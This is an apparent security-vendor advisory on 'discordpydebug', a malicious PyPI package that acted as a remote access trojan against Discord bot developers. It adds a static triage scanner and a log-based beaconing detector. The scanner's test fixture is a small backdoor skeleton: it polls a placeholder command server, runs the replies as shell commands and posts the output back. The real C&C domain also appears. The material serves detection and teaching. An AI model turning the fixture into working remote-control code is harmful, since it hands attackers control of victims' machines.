Malicious PyPi Package Targeting Discord Developers


Summary
In March 2022, a malicious Python package named ‘discordpydebug’ was uploaded to PyPI. It posed as a debugging utility for Discord.py developers but secretly functioned as a Remote Access Trojan (RAT). It was specifically designed to target developers working on Discord bots, often small teams or individuals who may install tools without thorough scrutiny.
Figure 1 – Malicious Python Package (Source: Socket.dev)
Exploiting PyPI’s limited security checks and the inherently trusting nature of developer communities on Discord, the package gained over 11,000 downloads despite lacking documentation. The incident underscores how threat actors can weaponize trust and social engineering in peer-driven environments, promoting harmful tools under the guise of helpful utilities.
Technical Analysis
Once installed, the package initiates communication with an attacker-controlled command-and-control (C&C) server located at backstabprotection.jamesx123.repl.co. The malicious behavior begins with the execution of the run() function, which sends a POST request to the server, including a "name" value, presumably used to identify the compromised host. This connection occurs silently and without the user's knowledge or consent, effectively enrolling the system into the attacker’s C&C infrastructure.
Figure 2 - Command and Control Initialization (Source – Socket.dev)
The backdoor is equipped with utility functions that enable reading from and writing to files on the victim’s machine. These functions leverage standard JSON operations, making it possible for the attacker to access or alter local files when commanded. When the C&C server sends specific keywords like readfile or writefile, the backdoor responds by interacting with the specified file paths. This capability allows the attacker to view or manipulate sensitive information, such as configuration files, authentication tokens, and stored credentials.
Figure 3 - File manipulation capabilities (Source – Socket.dev)
The main functionality is embedded within a continuous loop inside the debug() function, which runs endlessly, sending requests to the attacker’s server every second to check for new commands. Based on the instructions received, the malware can perform actions such as reading or writing files or executing arbitrary shell commands on the compromised system.
Figure 4 - Polling loop and command execution (Source – Socket.dev)
The logic, while simple, is highly dangerous. It performs three main operations: reading files, writing files, and executing shell commands. The loop captures the output of these actions, encodes it, and sends it back to the attacker via another POST request, effectively transforming the infected system into a remotely controlled bot.
The runcommand() function is responsible for executing shell commands sent from the C&C server:
Figure 5 - Executing shell commands (Source – Socket.dev)
This gives the attacker complete control over the compromised system, restricted only by the permission level of the Python process running the malware.
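The traits described above (a POST to a remote server inside an unbounded loop, file read/write helpers, and a shell-command executor in one small module) are exactly what a reviewer can look for before installing a package. The following static triage script is an added example for this article, not code from the package or from Socket.dev; it parses a module's AST and flags the co-occurrence of those traits. The sample modules it scans are constructed fixtures with hypothetical names and a placeholder host, not the real package source.

```python
"""Static triage of a Python module for RAT-like traits.

Added example (not from the page or the package): flags the combination
the analysis above describes, namely network polling in an unbounded loop,
command execution primitives, and file I/O in one module. Run it over the
files of an extracted sdist or wheel before installing.
"""
import ast
from dataclasses import dataclass, field

# Constructed fixture imitating the described traits; hypothetical names, placeholder host.
SAMPLE_MODULE = '''
import base64, json, subprocess, time, requests

SERVER = "http://c2.example.invalid/"   # placeholder, not a real host

def run(name):
    requests.post(SERVER, data={"name": name})

def readfile(path):
    with open(path) as fh:
        return json.load(fh)

def runcommand(cmd):
    return subprocess.check_output(cmd, shell=True)

def debug():
    while True:
        reply = requests.post(SERVER + "poll", data={"name": "host"})
        out = runcommand(reply.text)
        requests.post(SERVER + "out", data={"out": base64.b64encode(out)})
        time.sleep(1)
'''

# Constructed benign module: file I/O alone must not trip the verdict.
BENIGN_MODULE = '''
import json

def load_settings(path):
    with open(path) as fh:
        return json.load(fh)
'''

NETWORK_CALLS = {"requests.post", "requests.get", "urllib.request.urlopen",
                 "socket.create_connection"}
EXEC_CALLS = {"subprocess.check_output", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "os.system", "os.popen"}


@dataclass
class Findings:
    network: set = field(default_factory=set)      # network primitives seen
    exec_calls: set = field(default_factory=set)   # command execution primitives seen
    shell_true: bool = False    # subprocess invoked with shell=True
    loop_beacon: bool = False   # network call inside a `while True:` loop
    file_io: bool = False       # open() used in the same module


def _dotted(func):
    """Return the dotted name of a call target ('requests.post') or None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> Findings:
    """Walk the AST once and collect the traits that matter for the verdict."""
    findings = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in NETWORK_CALLS:
                findings.network.add(name)
            elif name in EXEC_CALLS:
                findings.exec_calls.add(name)
                for kw in node.keywords:
                    if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                        findings.shell_true = True
            elif name == "open":
                findings.file_io = True
        elif isinstance(node, ast.While):
            unbounded = isinstance(node.test, ast.Constant) and node.test.value is True
            if unbounded and any(isinstance(n, ast.Call) and _dotted(n.func) in NETWORK_CALLS
                                 for n in ast.walk(node)):
                findings.loop_beacon = True
    return findings


def verdict(findings: Findings):
    """Return (suspicious, reasons); two or more co-occurring traits trip the verdict."""
    reasons = []
    if findings.loop_beacon:
        reasons.append("unbounded loop polling a remote server")
    if findings.network and findings.exec_calls:
        reasons.append("network code and command execution in the same module")
    if findings.shell_true:
        reasons.append("subprocess invoked with shell=True")
    if findings.network and findings.file_io:
        reasons.append("file I/O alongside network calls")
    return len(reasons) >= 2, reasons


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MODULE), ("benign", BENIGN_MODULE)):
        flagged, why = verdict(triage(src))
        print(f"{label}: {'SUSPICIOUS' if flagged else 'ok'} {why}")
```

The verdict deliberately requires two independent traits: a single `subprocess` call or a single `open()` is ordinary in build tooling, whereas a module that polls a server forever and feeds the reply to a shell is not something a debugging helper needs.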
Recommendations
Avoid downloading pirated software from warez/torrent websites; "hack tools" promoted on sites such as YouTube and torrent sites often carry such malware.
Use strong passwords and enforce multi-factor authentication wherever possible.
Turn on the automatic software update feature on your computer, mobile, and other connected devices.
Use reputable anti-virus and internet security software on your connected devices, including your PC, laptop, and mobile device.
Refrain from opening untrusted links and email attachments without first verifying their authenticity.
Educate employees on protecting themselves from threats like phishing/untrusted URLs.
Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
Monitor beaconing at the network level to detect and block data exfiltration by malware or threat actors.
Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
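The backdoor described in the technical analysis polls its server every second, so the beaconing recommendation above is directly actionable: from one source to one host, the gaps between POST requests will be short and almost perfectly regular. The script below is an added example, not part of the original article, that applies that check to proxy log lines. The log format, timestamps and internal addresses are constructed for the demonstration; only the C&C domain is the one reported on this page.

```python
"""Detect fixed-interval POST beaconing in proxy logs.

Added example, not from the page: groups POSTs by (source, host) and flags
pairs whose inter-request gaps are short and nearly constant, the signature
of a sleep(1) polling loop. Expected line format (constructed here):
"<iso-timestamp> <src> <method> <host>".
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<host>\S+)")

# Constructed sample: 10.0.0.5 beacons to the reported C&C domain about once per second;
# 10.0.0.7 posts to a developer API at irregular, human-paced intervals.
SAMPLE_LOG = """
2022-03-10T12:00:00.000000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:01.000000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:02.000000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:03.200000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:04.200000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:05.200000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:06.200000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:07.200000 10.0.0.5 POST backstabprotection.jamesx123.repl.co
2022-03-10T12:00:00.500000 10.0.0.5 GET github.com
2022-03-10T12:00:00.000000 10.0.0.7 POST api.github.com
2022-03-10T12:00:00.400000 10.0.0.7 POST api.github.com
2022-03-10T12:00:02.100000 10.0.0.7 POST api.github.com
2022-03-10T12:00:02.300000 10.0.0.7 POST api.github.com
2022-03-10T12:00:04.900000 10.0.0.7 POST api.github.com
2022-03-10T12:00:05.000000 10.0.0.7 POST api.github.com
2022-03-10T12:00:31.000000 10.0.0.7 GET files.pythonhosted.org
"""


def parse(lines):
    """Yield (timestamp, src, method, host) for each well-formed line; skip the rest."""
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["method"], m["host"]


def find_beacons(events, min_requests=5, max_interval=5.0, max_jitter=0.15):
    """Return {(src, host): stats} for POST streams with short, near-constant gaps.

    max_jitter bounds the coefficient of variation (stdev / mean) of the gaps:
    a sleep(1) loop sits near 0, while interactive or library traffic is far above it.
    """
    stamps = defaultdict(list)
    for ts, src, method, host in events:
        if method == "POST":
            stamps[(src, host)].append(ts)
    hits = {}
    for pair, times in stamps.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0 or avg > max_interval:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits[pair] = {"requests": len(times), "interval_s": round(avg, 2),
                          "jitter": round(jitter, 3)}
    return hits


if __name__ == "__main__":
    for (src, host), stats in find_beacons(parse(SAMPLE_LOG.splitlines())).items():
        print(f"beacon candidate: {src} -> {host} {stats}")
```

The thresholds are starting points: a one-second cadence is unusually aggressive, so `max_interval` can be raised to catch slower implants, at the cost of more review work on legitimate pollers such as update checkers, which this check will also surface and which should be allow-listed by host.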
Conclusion
This incident serves as a stark reminder of the growing risks associated with open-source software ecosystems and the ease with which malicious actors can exploit community trust. By disguising a remote access trojan as a helpful debugging tool, the attacker was able to infiltrate thousands of developer systems through a popular package repository. The lack of thorough vetting on platforms like PyPI, combined with the informal sharing culture within developer communities, particularly on Discord, creates an ideal environment for such threats to spread. Developers must remain vigilant, scrutinize third-party packages, and adopt security best practices to protect their systems and data. This case underscores the urgent need for improved supply chain security and greater awareness of social engineering tactics in developer ecosystems.
Written by

FPT Metrodata Indonesia